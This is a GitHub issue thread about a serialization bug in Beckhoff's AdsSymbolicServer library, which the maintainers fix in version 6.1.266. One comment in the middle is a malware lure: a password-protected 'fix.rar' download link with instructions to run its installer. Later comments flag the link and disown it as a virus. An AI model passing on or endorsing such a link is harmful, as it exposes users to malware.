### ISSUE TITLE
AdsSymbolicServer is broken updating from ver <= 6.1.231 to ver >= 6.1.244

### ISSUE THREAD

**Issue by beppemarazzi** [Beckhoff/TF6000_ADS_DOTNET_V5_Samples#57]
I've just updated the nuget deps in my project and my SymbolicServer stopped to work.
After some binary try-and-error i found that with versions <= 6.1.231 all works as expected, with versions >= 6.1.244 there are problems.

When i ask types information from an Ads client (i.e. powershell tc management interface) i get a timeout with the new version.
```
> $s = New-TcSession -NetId Local -Port 26001

> $s | Get-AdsState

Name       State OK   Time (ms) Address
----       ----- --   --------- -------
XXXXXXX    Run   True 30        172.16.35.27.1.1:26001

> $s | Get-TcSymbol -Recurse -Force
Get-TcSymbol: Timeout has elapsed. (AdsErrorCode: 1861, 0x745)
```

while with old versions all works as expected:
```
> $s = New-TcSession -NetId Local -Port 26001

> $s | Get-AdsState

Name       State OK   Time (ms) Address
----       ----- --   --------- -------
XXXXXXX    Run   True 30        172.16.35.27.1.1:26001

> $s | Get-TcSymbol -Recurse -Force

InstancePath             Category  DataType     Size Static Persistant IG IO
------------             --------  --------     ---- ------ ---------- -- --
.I_StatoXXXX             Struct    ST_StatoXXXX 8    False  False      1  0
.I_StatoXXXX.ID          Primitive UINT         2    False  False      1  0
.I_StatoXXXX.StatoLogico Primitive UINT         2    False  False      1  2
.I_StatoXXXX.X           Primitive UDINT        4    False  False      1  4
```

Running the server in a debugger (i.e. visual studio 2022) there is an exception when the server tries to send the response for the type browsing request and **DECOMPILING THE LIBRARY**  the issue seems to be an `ArgumentOutOfRangeException` in function `AdsDataTypeEntry.Marshal` because you are trying to write `_extendedFlags` after the end of the allocated buffer. See the screenshot:
![image](https://github.com/user-attachments/assets/625c4f6d-0e03-4d2d-83a3-b984367dd5c6)

Please reconsider #40, sorry if I'm stressing again but it's in your interest because users like me should help to early catch and fix problems and whole quality of **YOUR** product may improve!!!
**SINCE WE HAVE NOT VISIBILITY ON THE SOURCE CODE** we are obligated to decompile your code and spend hours just to check if issues are in our code or in your... 
**Please, please, please again: make open the source code for this libraries!!!!!**

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by beppemarazzi** [comment]
@RalfHeitmann just few seconds after my issue was posted someone (Minecreft.Earth..) has polluted the issue report with a request of a "strange" very suspect file download....

**Comment by RalfHeitmann** [comment]
I have isolated the problem and fixed the issue. The Version 6.1.266 (now on Nuget) should solve it. Sorry for the inconvenience.

**Comment by beppemarazzi** [comment]
I can confirm that the new version 6.1.266 solves the issue

**Comment by MinecraftEarthVillage** [comment]
> 下载 https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
